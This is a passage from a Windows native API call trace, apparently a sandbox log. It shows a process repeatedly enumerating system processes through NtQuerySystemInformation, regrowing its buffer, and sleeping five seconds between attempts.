ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.486] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.518] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.549] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.571] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.590] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.619] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.630] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.640] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 